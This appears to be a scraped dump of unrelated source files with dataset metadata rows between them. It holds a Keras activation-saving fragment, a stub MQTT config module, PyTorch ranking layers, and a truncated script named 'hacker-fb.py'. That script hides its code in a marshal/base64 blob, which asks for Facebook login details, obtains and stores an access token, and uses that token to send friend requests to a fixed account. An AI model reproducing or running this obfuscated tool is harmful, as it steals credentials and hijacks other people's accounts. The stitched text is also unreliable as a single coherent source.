# Global Average Pooling the activations : saves space and removes pixel dependencies
dims = outs.shape
avgp_outs = skimage.measure.block_reduce(outs, (1, dims[1], dims[2],1), np.mean)
avgp_outs= avgp_outs.reshape((dims[0],-1))
#import pdb; pdb.set_trace()
embedding_[k][start_batch:end_batch]=avgp_outs
## end GAP. Like this it should take less space on the disk and solve all the problems
val_batch_no += 1
start_batch=end_batch
end_batch += batch_size
k += 1
# Saving outputs on an external file
c=0
for l in layers_of_interest:
np.save(directory_save+'/_training_emb_e{}_l{}_val_data'.format(epoch_number, l), embedding_[c])
# saving all the GAP acts with the name starting by _ so I can differentiate them
c+=1
if epoch_number % 10 == 0:
# allocating space and reusing the variable embedding_
embedding_=[]
for l in layers_of_interest:
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
#x = self.model.get_layer(l).output.shape[-3]
#y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
#space = np.zeros((len(x_val), x,y,z))
# Update: only storing/saving the pooled embeddings bc I'm filling up all the hard drives
space = np.zeros((len(x_train), z))
embedding_.append(space)
# this is a layer counter. I use it only to store the activations in the correct place in embedding_
k=0
for l in layers_of_interest:
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no <= tot_val_batches:
outs=self.get_activations(x_train[shuffle_idxs_val[start_batch:end_batch]], l)
# Global Average Pooling the activations : saves space and removes pixel dependencies
dims = outs.shape
avgp_outs = skimage.measure.block_reduce(outs, (1, dims[1], dims[2],1), np.mean)
avgp_outs= avgp_outs.reshape((dims[0],-1))
#import pdb; pdb.set_trace()
embedding_[k][start_batch:end_batch]=avgp_outs
## end GAP. Like this it should take less space on the disk and solve all the problems
val_batch_no += 1
start_batch=end_batch
end_batch += batch_size
k += 1
# Saving outputs on an external file
c=0
for l in layers_of_interest:
np.save(directory_save+'/_training_emb_e{}_l{}_val_data'.format(epoch_number, l), embedding_[c])
# saving all the GAP acts with the name starting by _ so I can differentiate them
c+=1
'''
epoch_number +=1
self.training_history=history
#self.embeddings = embeddings
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
try:
np.save(folder+'/'+name+'_history', self.training_history.history)
except:
print "History not saved"
return
| 43.558201 | 190 | 0.560325 | 8,065 | 65,860 | 4.349659 | 0.061872 | 0.044641 | 0.022748 | 0.025086 | 0.901055 | 0.886545 | 0.867474 | 0.855217 | 0.851995 | 0.840564 | 0 | 0.022332 | 0.335044 | 65,860 | 1,511 | 191 | 43.587028 | 0.778691 | 0.123428 | 0 | 0.826415 | 0 | 0 | 0.039646 | 0.018505 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.013836 | null | null | 0.033962 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8c8a77e5b1874bff721e091896b57b252e0f8230 | 200 | py | Python | NodeDefender/mqtt/message/respond/icpe/sys/config.py | CTSNE/NodeDefender | 24e19f53a27d3b53e599cba8b1448f8f16c0bd5e | [
"MIT"
] | 4 | 2016-09-23T17:51:05.000Z | 2017-03-14T02:52:26.000Z | NodeDefender/mqtt/message/respond/icpe/sys/config.py | CTSNE/NodeDefender | 24e19f53a27d3b53e599cba8b1448f8f16c0bd5e | [
"MIT"
] | 1 | 2016-09-22T11:32:33.000Z | 2017-11-14T10:00:24.000Z | NodeDefender/mqtt/message/respond/icpe/sys/config.py | CTSNE/NodeDefender | 24e19f53a27d3b53e599cba8b1448f8f16c0bd5e | [
"MIT"
] | 4 | 2016-10-09T19:05:16.000Z | 2020-05-14T04:00:30.000Z | import NodeDefender
def save(topic, payload):
return True
def default(topic, payload):
return True
def backup(topic, payload):
return True
def restore(topic, payload):
return True
| 14.285714 | 28 | 0.71 | 26 | 200 | 5.461538 | 0.423077 | 0.338028 | 0.507042 | 0.619718 | 0.528169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21 | 200 | 13 | 29 | 15.384615 | 0.898734 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0 | 0.111111 | 0.444444 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8c9ca5927feb19eae6d7b269613e91e01bb0fd39 | 16,294 | py | Python | model/layers.py | anonymous-author1990/QS3M | 8fa16b621e5507258c0fea76a8e53b0ab8ab3423 | [
"Apache-2.0"
] | null | null | null | model/layers.py | anonymous-author1990/QS3M | 8fa16b621e5507258c0fea76a8e53b0ab8ab3423 | [
"Apache-2.0"
] | null | null | null | model/layers.py | anonymous-author1990/QS3M | 8fa16b621e5507258c0fea76a8e53b0ab8ab3423 | [
"Apache-2.0"
] | null | null | null | import torch
torch.manual_seed(42)
import torch.nn as nn
class CATS(nn.Module): # CATS
def __init__(self, emb_size):
super(CATS, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(5 * emb_size, 1)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.z1 = torch.abs(self.Xp1 - self.Xq)
self.z2 = torch.abs(self.Xp2 - self.Xq)
self.zdiff = torch.abs(self.Xp1 - self.Xp2)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2)))
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
self.zdqp1 = torch.abs(self.zp1 - self.zql)
self.zdqp2 = torch.abs(self.zp2 - self.zql)
self.z = torch.cat((self.zp1, self.zp2, self.zd, self.zdqp1, self.zdqp2), dim=1)
o = torch.relu(self.LL3(self.z))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_Ablation(nn.Module):
def __init__(self, emb_size):
super(CATS_Ablation, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(3 * emb_size, 1)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
#self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
#self.z1 = torch.abs(self.Xp1 - self.Xq)
#self.z2 = torch.abs(self.Xp2 - self.Xq)
self.zdiff = torch.abs(self.Xp1 - self.Xp2)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2)))
#self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
#self.zdqp1 = torch.abs(self.zp1 - self.zql)
#self.zdqp2 = torch.abs(self.zp2 - self.zql)
#self.z = torch.cat((self.zp1, self.zp2, self.zd, self.zdqp1, self.zdqp2), dim=1)
self.z = torch.cat((self.zp1, self.zp2, self.zd), dim=1)
o = torch.relu(self.LL3(self.z))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class Sent_Attention(nn.Module):
def __init__(self, emb_size, n):
super(Sent_Attention, self).__init__()
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.emb_size = emb_size
self.n = n
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(5 * emb_size, 1)
self.Wa = nn.Parameter(torch.tensor(torch.randn(2*emb_size, self.n), requires_grad=True).to(device))
self.va = nn.Parameter(torch.tensor(torch.randn(self.n, 1), requires_grad=True).to(device))
self.tanh = nn.Tanh()
self.cos = nn.CosineSimilarity()
def forward(self, Xq, Xp):
'''
:param Xq: context vec of shape (m X vec size)
:param Xp: para sent vecs of shape (m X 2*vec size + 2 X max seq len)
:return: Pairwise CATS scores of shape (mC2 X 1)
'''
b = Xq.shape[0]
seq = Xp.shape[2]
self.Xq = Xq
self.Xp1 = Xp[:, :self.emb_size + 1, :]
self.Xp2 = Xp[:, self.emb_size + 1:, :]
self.Xp1valid = self.Xp1[:, -1, :]
self.Xp2valid = self.Xp2[:, -1, :]
self.Xp1 = self.Xp1[:, :self.emb_size, :]
self.Xp2 = self.Xp2[:, :self.emb_size, :]
self.Xqp1 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp1), 1)
self.S1 = torch.mul(self.Xp1valid, torch.mm(self.tanh(
torch.mm(self.Xqp1.permute(0,2,1).reshape(-1, 2*self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta1 = torch.exp(self.S1) / torch.sum(torch.exp(self.S1), 1).unsqueeze(1).repeat(1, seq)
self.Xp1dash = torch.sum(torch.mul(self.beta1.reshape(b, 1, seq), self.Xp1), 2)
self.Xqp2 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp2), 1)
self.S2 = torch.mul(self.Xp2valid, torch.mm(self.tanh(
torch.mm(self.Xqp2.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta2 = torch.exp(self.S2) / torch.sum(torch.exp(self.S2), 1).unsqueeze(1).repeat(1, seq)
self.Xp2dash = torch.sum(torch.mul(self.beta2.reshape(b, 1, seq), self.Xp2), 2)
o = self.cos(self.Xp1dash, self.Xp2dash)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_Attention(nn.Module):
def __init__(self, emb_size, n):
super(CATS_Attention, self).__init__()
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.emb_size = emb_size
self.n = n
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(5 * emb_size, 1)
self.Wa = nn.Parameter(torch.tensor(torch.randn(2 * emb_size, self.n), requires_grad=True).to(device))
self.va = nn.Parameter(torch.tensor(torch.randn(self.n, 1), requires_grad=True).to(device))
self.tanh = nn.Tanh()
def forward(self, Xq, Xp):
'''
:param Xq: context vec of shape (m X vec size)
:param Xp: para sent vecs of shape (m X 2*vec size + 2 X max seq len)
:return: Pairwise CATS scores of shape (mC2 X 1)
'''
b = Xq.shape[0]
seq = Xp.shape[2]
self.Xq = Xq
self.Xp1 = Xp[:, :self.emb_size + 1, :]
self.Xp2 = Xp[:, self.emb_size + 1:, :]
self.Xp1valid = self.Xp1[:, -1, :]
self.Xp2valid = self.Xp2[:, -1, :]
self.Xp1 = self.Xp1[:, :self.emb_size, :]
self.Xp2 = self.Xp2[:, :self.emb_size, :]
self.Xqp1 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp1), 1)
self.S1 = torch.mul(self.Xp1valid, torch.mm(self.tanh(
torch.mm(self.Xqp1.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta1 = torch.exp(self.S1) / torch.sum(torch.exp(self.S1), 1).unsqueeze(1).repeat(1, seq)
self.Xp1dash = torch.sum(torch.mul(self.beta1.reshape(b, 1, seq), self.Xp1), 2)
self.Xqp2 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp2), 1)
self.S2 = torch.mul(self.Xp2valid, torch.mm(self.tanh(
torch.mm(self.Xqp2.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta2 = torch.exp(self.S2) / torch.sum(torch.exp(self.S2), 1).unsqueeze(1).repeat(1, seq)
self.Xp2dash = torch.sum(torch.mul(self.beta2.reshape(b, 1, seq), self.Xp2), 2)
self.z1 = torch.abs(self.Xp1dash - self.Xq)
self.z2 = torch.abs(self.Xp2dash - self.Xq)
self.zdiff = torch.abs(self.Xp1dash - self.Xp2dash)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1dash)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2dash)))
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
self.zdqp1 = torch.abs(self.zp1 - self.zql)
self.zdqp2 = torch.abs(self.zp2 - self.zql)
self.z = torch.cat((self.zp1, self.zp2, self.zd, self.zdqp1, self.zdqp2), dim=1)
o = torch.relu(self.LL3(self.z))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class Sent_FixedCATS_Attention(nn.Module):
def __init__(self, emb_size, n, cats_model):
super(Sent_FixedCATS_Attention, self).__init__()
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.emb_size = emb_size
self.n = n
self.cats = cats_model
self.cats.eval()
self.Wa = nn.Parameter(torch.tensor(torch.randn(2*emb_size, self.n), requires_grad=True).to(device))
self.va = nn.Parameter(torch.tensor(torch.randn(self.n, 1), requires_grad=True).to(device))
self.tanh = nn.Tanh()
self.cos = nn.CosineSimilarity()
def forward(self, Xq, Xp):
'''
:param Xq: context vec of shape (m X vec size)
:param Xp: para sent vecs of shape (m X 2*vec size + 2 X max seq len)
:return: Pairwise CATS scores of shape (mC2 X 1)
'''
b = Xq.shape[0]
seq = Xp.shape[2]
self.Xq = Xq
self.origXq = Xq
self.Xp1 = Xp[:, :self.emb_size + 1, :]
self.Xp2 = Xp[:, self.emb_size + 1:, :]
self.Xp1valid = self.Xp1[:, -1, :]
self.Xp2valid = self.Xp2[:, -1, :]
self.Xp1 = self.Xp1[:, :self.emb_size, :]
self.Xp2 = self.Xp2[:, :self.emb_size, :]
self.Xqp1 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp1), 1)
self.S1 = torch.mul(self.Xp1valid, torch.mm(self.tanh(
torch.mm(self.Xqp1.permute(0,2,1).reshape(-1, 2*self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta1 = torch.exp(self.S1) / torch.sum(torch.exp(self.S1), 1).unsqueeze(1).repeat(1, seq)
self.Xp1dash = torch.sum(torch.mul(self.beta1.reshape(b, 1, seq), self.Xp1), 2)
self.Xqp2 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp2), 1)
self.S2 = torch.mul(self.Xp2valid, torch.mm(self.tanh(
torch.mm(self.Xqp2.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta2 = torch.exp(self.S2) / torch.sum(torch.exp(self.S2), 1).unsqueeze(1).repeat(1, seq)
self.Xp2dash = torch.sum(torch.mul(self.beta2.reshape(b, 1, seq), self.Xp2), 2)
X = torch.cat((self.origXq, self.Xp1dash, self.Xp2dash), 1)
o = self.cats(X)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_Scaled(nn.Module): # CAVS
def __init__(self, emb_size):
super(CATS_Scaled, self).__init__()
self.emb_size = emb_size
self.n = 32
self.LL1 = nn.Linear(emb_size, self.n)
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.A = nn.Parameter(torch.tensor(torch.randn(self.n, emb_size), requires_grad=True).to(device))
self.cos = nn.CosineSimilarity()
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.Xlq = torch.relu(self.LL1(self.Xq))
self.scale = torch.mm(self.Xlq, self.A)
self.zp1 = torch.mul(self.Xp1, self.scale)
self.zp2 = torch.mul(self.Xp2, self.scale)
o = self.cos(self.zp1, self.zp2)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_QueryScaler(nn.Module):
def __init__(self, emb_size):
super(CATS_QueryScaler, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(emb_size, emb_size)
self.cos = nn.CosineSimilarity()
self.pdist = nn.PairwiseDistance(p=2)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zp1 = torch.mul(self.zql, self.Xp1)
self.zp2 = torch.mul(self.zql, self.Xp2)
o = self.cos(self.zp1, self.zp2)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_manhattan(nn.Module):
def __init__(self, emb_size):
super(CATS_manhattan, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.z1 = torch.abs(self.Xp1 - self.Xq)
self.z2 = torch.abs(self.Xp2 - self.Xq)
self.zdiff = torch.abs(self.Xp1 - self.Xp2)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2)))
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
self.zdqp1 = torch.abs(self.zp1 - self.zql)
self.zdqp2 = torch.abs(self.zp2 - self.zql)
self.p1tr = torch.cat((self.zp1, self.zdqp1), dim=1)
self.p2tr = torch.cat((self.zp2, self.zdqp2), dim=1)
o = torch.exp(-torch.sum(torch.abs(self.p1tr-self.p2tr), dim=1))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred | 40.133005 | 116 | 0.584326 | 2,526 | 16,294 | 3.662708 | 0.056215 | 0.077929 | 0.071336 | 0.043774 | 0.942175 | 0.924773 | 0.917748 | 0.901643 | 0.894401 | 0.871812 | 0 | 0.038009 | 0.265312 | 16,294 | 406 | 117 | 40.133005 | 0.734859 | 0.116791 | 0 | 0.848387 | 0 | 0 | 0.002554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103226 | false | 0 | 0.006452 | 0 | 0.212903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8cbf026e619f5f1de7507cff629be58a03d2fe1e | 23,145 | py | Python | hacker-fb.py | Nursy4h/King-Z | fa103fc3a1457c4c4e8d0d0e16d22874cbb89beb | [
"Apache-2.0"
] | null | null | null | hacker-fb.py | Nursy4h/King-Z | fa103fc3a1457c4c4e8d0d0e16d22874cbb89beb | [
"Apache-2.0"
] | null | null | null | hacker-fb.py | Nursy4h/King-Z | fa103fc3a1457c4c4e8d0d0e16d22874cbb89beb | [
"Apache-2.0"
] | null | null | null | ######################################
# Thank You Allah Swt.. #
# Thanks My Team : 1MP3R10R-T24M. #
# Thnks You All My Friends me. #
# Leader : Thio #
# CO Founder : Zhenter #
# CO Leader : Nazril #
# CO : rimesther #
# Cyto Xploit, Sazxt, Minewizard, #
######################################
import marshal, base64
exec(marshal.loads(base64.b16decode("630000000000000000040000004000000073170200006400006401006C00005A00006400006401006C01005A01006400006401006C02005A02006400006401006C03005A03006400006401006C04005A04006400006401006C05005A05006400006401006C06005A06006400006401006C07005A07006400006401006C08005A08006400006401006C09005A09006400006401006C0A005A0A006400006401006C0B005A0B006400006401006C0C005A0C006400006402006C0D006D0E005A0E00016400006403006C0F006D10005A1000016400006404006C0C006D11005A110001651200650100830100016501006A130064050083010001650C006A11008300005A14006514006A1500651600830100016514006A1700650C006A18006A1900830000640600640700830101016418006701006514005F1A00640A008400005A1B00640B008400005A1C00640C008400005A1D006500006A1E00640D0083010001640E008400005A1F00640F005A20006700005A21006700005A22006700005A23006700005A24006700005A25006700005A26006700005A27006700005A28006700005A29006700005A2A006700005A2B006700005A2C006700005A2D006700005A2E006700005A2F006700005A30006700005A31006410005A32006411005A33006412008400005A34006413008400005A35006414008400005A36006415008400005A37006538006416008401005A3900653A006417006B0200721302653400830000016E000064010053281900000069FFFFFFFF4E2801000000740A000000546872656164506F6F6C2801000000740F000000436F6E6E656374696F6E4572726F722801000000740700000042726F7773657274040000007574663874080000006D61785F74696D656901000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E31366300000000000000000100000043000000731600000064010047487400006A01006A0200830000016400005328020000004E73160000000A1B5B33393B316D205468616E6B20596F75202A5F2A280300000074020000006F7374030000007379737404000000657869742800000000280000000028000000007302000000646774060000006B656C7561720E0000007304000000000105016300000000000000000200000043000000733200000064010047487400006A0100640200830100016403004748640400474864010047487400006A02006A0300830000016400005328050000004E7401000000207405000000636C656172734A0000000A1B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B33313B316D4B6F6E656B7369205465727075747573201B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D73650000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D53696C61686B616E20506572696B7361204B656D62616C69204B6F6E656B736920496E7465726E657420416E64611B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D28040000005205000000740600000073797374656D520600000052070000002800000000280000000028000000007302000000646774030000006F747712000000730C000000000105010D0105010501050163010000000200000003000000430000007343000000783C007C000064010017445D30007D01007400006A01006A02007C0100830100017400006A01006A0300830000017404006A050064020083010001710B00576400005328030000004E73010000000A677B14AE47E17A843F2806000000520600000074060000007374646F7574740500000077726974657405000000666C757368740400000074696D657405000000736C656570280200000074010000007A740100000065280000000028000000007302000000646774050000006A616C616E1A00000073080000000001110110010D01730C0000007368206E61726765742E73686300000000020000000600000043000000734F0000006401006402006403006404006405006406006706007D00007830007C0000445D28007D01006407007C010017477400006A01006A0200830000017403006A040064080083010001711F00576400005328090000004E73040000002E20202073040000002E2E202073040000002E2E2E2073050000002E2E2E2E2073050000002E2E2E2E2E73060000002E2E2E2E2E2E73330000000D1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D536564616E67204C6F67696E1B5B33393B316D690100000028050000005206000000520D000000520F0000005210000000521100000028020000007405000000746974696B74010000006F2800000000280000000073020000006467740300000074696B23000000730A000000000218010D0108010D016900000000730D0000001B5B33316D4E6F742056756C6E73090000001B5B33326D56756C6E63000000000B000000060000004300000073170300007400006A010064010083010001791A007402006402006403008302007D000074030083000001576EE902047404007405006602006B0A007212030101017400006A0100640100830100017400006A0100640400830100017400006A01006405008301000164060047487406006407008301007D0100640800474864060047487406006409008301007D020064080047486406004748740700830000017911007408006A0200640A0083010001576E2D00047409006A0A006B0A0072DC00010101640B004748740B006A0C00640C0083010001740D00830000016E010058740E007408006A0F005F10007408006A1100640D00640E00830001017C01007408006A1200640F003C7C02007408006A12006410003C7408006A1300830000017408006A14008300007D03006411007C03006B0600729602793D016412007C010017641300177C020017641400177D0400690B0064150064160036641700641800367C0100640F0036641900641A0036641B00641C0036641B00641D0036641E00641F0036642000642100367C02006417003664220064230036642400642500367D05007415006A16006426008301007D06007C06006A17007C0400830100017C06006A18008300007D07007C05006A17006901007C070064270036830100016428007D03007419006A1A007C03006429007C05008301017D0800741B006A1C007C08006A1D008301007D0900740200640200642A008302007D0A007C0A006A1E007C0900642B0019830100017C0A006A1F0083000001640B004748642C004748642D00474864080047487419006A2000642E007C0900642B00191783010001740B006A0C00642F00830100017403008300000157719602047419006A21006A22006B0A00729202010101740D0083000001719602586E00006430007C03006B060072DA02640B0047486431004748643200474864310047487400006A010064330083010001740B006A0C00640C008301000174230083000001711303640B004748642C004748643400474864080047487400006A010064330083010001740B006A0C0064350083010001742400830000016E0100586400005328360000004E520A00000073090000006C6F67696E2E747874740100000072730C0000007368206E61726765742E736873070000007368206F2E736873370000000000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959773480000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D476D61696C1B5B33313B316D2F1B5B33353B316D4E6F6D6F721B5B313B39316D3A1B5B313B33396D2073370000000000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D733A0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D50617373776F72642046421B5B313B39316D3A1B5B313B33396D20731600000068747470733A2F2F6D2E66616365626F6F6B2E636F6D73380000000A0000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D690100000074020000006E7269000000007405000000656D61696C740400000070617373730B000000736176652D64657669636573470000006170695F6B65793D383832613834393033363164613938373032626639376130323164646331346463726564656E7469616C735F747970653D70617373776F7264656D61696C3D7360000000666F726D61743D4A534F4E67656E65726174655F6D616368696E655F69643D3167656E65726174655F73657373696F6E5F636F6F6B6965733D316C6F63616C653D656E5F55536D6574686F643D617574682E6C6F67696E70617373776F72643D733B00000072657475726E5F73736C5F7265736F75726365733D30763D312E3036326638636539663734623132663834633132336363323334333761346133327420000000383832613834393033363164613938373032626639376130323164646331346474070000006170695F6B6579740800000070617373776F7264741000000063726564656E7469616C735F7479706574040000004A534F4E7406000000666F726D6174740100000031741300000067656E65726174655F6D616368696E655F6964741800000067656E65726174655F73657373696F6E5F636F6F6B6965737405000000656E5F555374060000006C6F63616C65730A000000617574682E6C6F67696E74060000006D6574686F64740100000030741400000072657475726E5F73736C5F7265736F75726365737303000000312E3074010000007674030000006D64357403000000736967732700000068747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E7068707406000000706172616D73740100000077740C0000006163636573735F746F6B656E73380000000A0000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29597732E0000001B5B313B33396D5B1B5B313B33326DE29C931B5B313B33396D5D201B5B313B39326D4C6F67696E20537563657373734D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6D6574686F643D706F737426756964733D6777696D75736133266163636573735F746F6B656E3D6902000000740A000000636865636B706F696E74520900000073470000000A1B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D536570657274696E796120416B756E20466220416E6461204B656E6120436865636B706F696E747310000000726D202D7266206C6F67696E2E747874732C0000001B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D4C6F67696E20476167616C2121690300000028250000005205000000520B00000074040000006F70656E7405000000737570657274080000004B65794572726F727407000000494F4572726F7274090000007261775F696E70757452170000007402000000627274090000006D656368616E697A65740800000055524C4572726F7252100000005211000000520C00000074040000005472756574080000005F666163746F7279740700000069735F68746D6C740B00000073656C6563745F666F726D7404000000666F726D74060000007375626D6974740600000067657475726C7407000000686173686C6962740300000